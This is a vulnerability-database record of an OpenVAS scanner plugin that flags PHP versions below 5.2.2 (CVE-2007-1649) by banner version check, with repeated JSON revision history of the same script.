ID OPENVAS:1361412562310110185 Type openvas Reporter Copyright NopSec Inc. 2012 Modified 2018-07-09T00:00:00
Description
PHP version smaller than 5.2.2 suffers from a vulnerability.
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_php_5_2_2.nasl 10460 2018-07-09 07:50:03Z cfischer $
#
# PHP Version < 5.2.2 Vulnerability
#
# Authors:
# Songhan Yu <syu@nopsec.com>
#
# Copyright:
# Copyright NopSec Inc. 2012, http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:php:php";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.110185");
script_version("$Revision: 10460 $");
script_tag(name:"last_modification", value:"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $");
script_tag(name:"creation_date", value:"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_cve_id("CVE-2007-1649");
script_bugtraq_id(23105);
script_name("PHP Version < 5.2.2 Vulnerability");
script_category(ACT_GATHER_INFO);
script_family("Web application abuses");
script_copyright("Copyright NopSec Inc. 2012");
script_dependencies("gb_php_detect.nasl");
script_mandatory_keys("php/installed");
script_tag(name:"solution", value:"Update PHP to version 5.2.2 or later.");
script_tag(name:"summary", value:"PHP version smaller than 5.2.2 suffers from a vulnerability.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_banner_unreliable");
exit(0);
}
include("version_func.inc");
include("host_details.inc");
if( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );
if( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );
if( version_is_less( version:vers, test_version:"5.2.2" ) ) {
report = report_fixed_ver( installed_version:vers, fixed_version:"5.2.2" );
security_message( data:report, port:port );
exit( 0 );
}
exit( 99 );
{"id": "OPENVAS:1361412562310110185", "bulletinFamily": "scanner", "title": "PHP Version < 5.2.2 Vulnerability", "description": "PHP version smaller than 5.2.2 suffers from a vulnerability.", "published": "2012-06-21T00:00:00", "modified": "2018-07-09T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110185", "reporter": "Copyright NopSec Inc. 2012", "references": [], "cvelist": ["CVE-2007-1649"], "type": "openvas", "lastseen": "2018-09-01T23:36:08", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2007-1649"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "PHP version smaller than 5.2.2 suffers from a vulnerability.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "72d69f482a48547e4bada73a87b7956b848476ab6e20c28d22e2a556ff91a027", "hashmap": [{"hash": "48d60a46ed3f845ea90484e4bf421124", "key": "modified"}, {"hash": "771cfcd806ec586469df458d0a2f6c9e", "key": "cvelist"}, {"hash": "817f978053aa6a738be0d9fddcc65f63", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4b4d02a80d069e672a6bb22605bb96ef", "key": "published"}, {"hash": "2dece3da7e2f8d0314e22d7b381f421d", "key": "reporter"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "85a6057dd5fc19554bbe69033c823aa9", "key": "href"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "43ecee0d3312f5f5114cf5903f72e49d", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5ce3930acab02ad9975e8997eabcc1fa", "key": "title"}, {"hash": "8174a2e5302af538ecf649520d90ae22", "key": "pluginID"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110185", "id": "OPENVAS:1361412562310110185", "lastseen": "2018-08-30T19:16:42", "modified": "2018-07-09T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310110185", "published": "2012-06-21T00:00:00", "references": [], "reporter": "Copyright NopSec Inc. 2012", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_2.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.2.2 Vulnerability\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110185\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_cve_id(\"CVE-2007-1649\");\n script_bugtraq_id(23105);\n script_name(\"PHP Version < 5.2.2 Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.2.2 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.2.2 suffers from a vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.2\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "title": "PHP Version < 5.2.2 Vulnerability", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:16:42"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2007-1649"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "PHP version smaller than 5.2.2 suffers from a vulnerability.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ff45c4f170505325784c577f9588e104fe2bb48531d804e89f6c6cf85d64fde3", "hashmap": [{"hash": "771cfcd806ec586469df458d0a2f6c9e", "key": "cvelist"}, {"hash": "f21f8d11e30f6f5a26a21a2e3060a604", "key": "sourceData"}, {"hash": "817f978053aa6a738be0d9fddcc65f63", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4b4d02a80d069e672a6bb22605bb96ef", "key": "published"}, {"hash": "2dece3da7e2f8d0314e22d7b381f421d", "key": "reporter"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "9c03d31da5599a930b848ba03dfd9c0d", "key": "modified"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "85a6057dd5fc19554bbe69033c823aa9", "key": "href"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5ce3930acab02ad9975e8997eabcc1fa", "key": "title"}, {"hash": "8174a2e5302af538ecf649520d90ae22", "key": "pluginID"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110185", "id": "OPENVAS:1361412562310110185", "lastseen": "2017-10-30T10:54:45", "modified": "2017-10-26T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310110185", "published": "2012-06-21T00:00:00", "references": [], "reporter": "Copyright NopSec Inc. 2012", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_2.nasl 7585 2017-10-26 15:03:01Z cfischer $\n# \n# PHP Version < 5.2.2 Vulnerability\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110185\");\n script_version(\"$Revision: 7585 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 17:03:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_cve_id(\"CVE-2007-1649\");\n script_bugtraq_id(23105);\n script_name(\"PHP Version < 5.2.2 Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"php/installed\");\n\n tag_solution = \"Update PHP to version 5.2.2 or later.\";\n\n tag_summary = \"PHP version smaller than 5.2.2 suffers from a vulnerability.\";\n\n script_tag(name:\"solution\", value:tag_solution);\n script_tag(name:\"summary\", value:tag_summary);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.2\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "title": "PHP Version < 5.2.2 Vulnerability", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2017-10-30T10:54:45"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2007-1649"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "PHP version smaller than 5.2.2 suffers from a vulnerability.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "9899e5212086f411bbd23e9aec147d0f51b21c6f422311fa08048c6002d213fd", "hashmap": [{"hash": "48d60a46ed3f845ea90484e4bf421124", "key": "modified"}, {"hash": "771cfcd806ec586469df458d0a2f6c9e", "key": "cvelist"}, {"hash": "817f978053aa6a738be0d9fddcc65f63", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4b4d02a80d069e672a6bb22605bb96ef", "key": "published"}, {"hash": "2dece3da7e2f8d0314e22d7b381f421d", "key": "reporter"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "85a6057dd5fc19554bbe69033c823aa9", "key": "href"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "43ecee0d3312f5f5114cf5903f72e49d", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5ce3930acab02ad9975e8997eabcc1fa", "key": "title"}, {"hash": "8174a2e5302af538ecf649520d90ae22", "key": "pluginID"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110185", "id": "OPENVAS:1361412562310110185", "lastseen": "2018-07-10T17:56:30", "modified": "2018-07-09T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310110185", "published": "2012-06-21T00:00:00", "references": [], "reporter": "Copyright NopSec Inc. 2012", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_2.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.2.2 Vulnerability\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110185\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_cve_id(\"CVE-2007-1649\");\n script_bugtraq_id(23105);\n script_name(\"PHP Version < 5.2.2 Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.2.2 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.2.2 suffers from a vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.2\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "title": "PHP Version < 5.2.2 Vulnerability", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-07-10T17:56:30"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2007-1649"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "PHP version smaller than 5.2.2 suffers from a vulnerability.", "edition": 1, "enchantments": {}, "hash": "7a2af07ca5c01b94ad077d41e367eced390758aa2e799467d2b3ebd0ac6a1e0f", "hashmap": [{"hash": "6da9156149dea12370090bb2150079ab", "key": "sourceData"}, {"hash": "771cfcd806ec586469df458d0a2f6c9e", "key": "cvelist"}, {"hash": "e67e8e58252067a4002e64424c40e183", "key": "title"}, {"hash": "817f978053aa6a738be0d9fddcc65f63", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4b4d02a80d069e672a6bb22605bb96ef", "key": "published"}, {"hash": "2dece3da7e2f8d0314e22d7b381f421d", "key": "reporter"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "85a6057dd5fc19554bbe69033c823aa9", "key": "href"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "3044cdbad1ed41bd94a84f79f899b09e", "key": "modified"}, {"hash": "8174a2e5302af538ecf649520d90ae22", "key": "pluginID"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110185", "id": "OPENVAS:1361412562310110185", "lastseen": "2017-07-02T21:10:44", "modified": "2016-11-14T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310110185", "published": "2012-06-21T00:00:00", "references": [], "reporter": "Copyright NopSec Inc. 2012", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_2.nasl 4506 2016-11-14 15:24:24Z cfi $\n# \n# PHP Version < 5.2.2 Vulnerabilitiy\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110185\");\n script_version(\"$Revision: 4506 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-11-14 16:24:24 +0100 (Mon, 14 Nov 2016) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_cve_id(\"CVE-2007-1649\");\n script_bugtraq_id(23105);\n script_name(\"PHP Version < 5.2.2 Vulnerabilitiy\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"php/installed\");\n\n tag_solution = \"Update PHP to version 5.2.2 or later.\";\n\n tag_summary = \"PHP version smaller than 5.2.2 suffers from a vulnerability.\";\n\n script_tag(name:\"solution\", value:tag_solution);\n script_tag(name:\"summary\", value:tag_summary);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.2\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "title": "PHP Version < 5.2.2 Vulnerabilitiy", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:10:44"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2007-1649"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "PHP version smaller than 5.2.2 suffers from a vulnerability.", "edition": 2, "enchantments": {}, "hash": "ced6e9e52bd3c7661fe9dd0fa1f198395ed20391ed1b8f9085ec69d792d4e7db", "hashmap": [{"hash": "771cfcd806ec586469df458d0a2f6c9e", "key": "cvelist"}, {"hash": "e67e8e58252067a4002e64424c40e183", "key": "title"}, {"hash": "817f978053aa6a738be0d9fddcc65f63", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4b4d02a80d069e672a6bb22605bb96ef", "key": "published"}, {"hash": "2dece3da7e2f8d0314e22d7b381f421d", "key": "reporter"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "6471a58d07d02007bedee46eb6e70a10", "key": "modified"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "85a6057dd5fc19554bbe69033c823aa9", "key": "href"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "d7b0d6be8e1aa53c20a240d6d2c5b6c3", "key": "sourceData"}, {"hash": "8174a2e5302af538ecf649520d90ae22", "key": "pluginID"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110185", "id": "OPENVAS:1361412562310110185", "lastseen": "2017-08-17T13:27:21", "modified": "2017-08-03T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310110185", "published": "2012-06-21T00:00:00", "references": [], "reporter": "Copyright NopSec Inc. 2012", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_2.nasl 6841 2017-08-03 11:59:21Z emoss $\n# \n# PHP Version < 5.2.2 Vulnerabilitiy\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110185\");\n script_version(\"$Revision: 6841 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-03 13:59:21 +0200 (Thu, 03 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_cve_id(\"CVE-2007-1649\");\n script_bugtraq_id(23105);\n script_name(\"PHP Version < 5.2.2 Vulnerabilitiy\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"php/installed\");\n\n tag_solution = \"Update PHP to version 5.2.2 or later.\";\n\n tag_summary = \"PHP version smaller than 5.2.2 suffers from a vulnerability.\";\n\n script_tag(name:\"solution\", value:tag_solution);\n script_tag(name:\"summary\", value:tag_summary);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.2\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "title": "PHP Version < 5.2.2 Vulnerabilitiy", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData", "title"], "edition": 2, "lastseen": "2017-08-17T13:27:21"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "771cfcd806ec586469df458d0a2f6c9e"}, {"key": "cvss", "hash": "313104e31e57b9f7aa405f5f0fc56a4e"}, {"key": "description", "hash": "817f978053aa6a738be0d9fddcc65f63"}, {"key": "href", "hash": "85a6057dd5fc19554bbe69033c823aa9"}, {"key": "modified", "hash": "48d60a46ed3f845ea90484e4bf421124"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "8174a2e5302af538ecf649520d90ae22"}, {"key": "published", "hash": "4b4d02a80d069e672a6bb22605bb96ef"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2dece3da7e2f8d0314e22d7b381f421d"}, {"key": "sourceData", "hash": "43ecee0d3312f5f5114cf5903f72e49d"}, {"key": "title", "hash": "5ce3930acab02ad9975e8997eabcc1fa"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "9899e5212086f411bbd23e9aec147d0f51b21c6f422311fa08048c6002d213fd", "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1649"]}, {"type": "exploitdb", "idList": ["EDB-ID:3559"]}, {"type": "osvdb", "idList": ["OSVDB:33943"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7472"]}, {"type": "nessus", "idList": ["PHP_5_2_2.NASL", "MANDRIVA_MDVSA-2008-126.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:830416", "OPENVAS:1361412562310830416"]}], "modified": "2018-09-01T23:36:08"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_2.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.2.2 Vulnerability\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110185\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_cve_id(\"CVE-2007-1649\");\n script_bugtraq_id(23105);\n script_name(\"PHP Version < 5.2.2 Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.2.2 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.2.2 suffers from a vulnerability.\");\n\n script_tag(name:\"solution_type\", 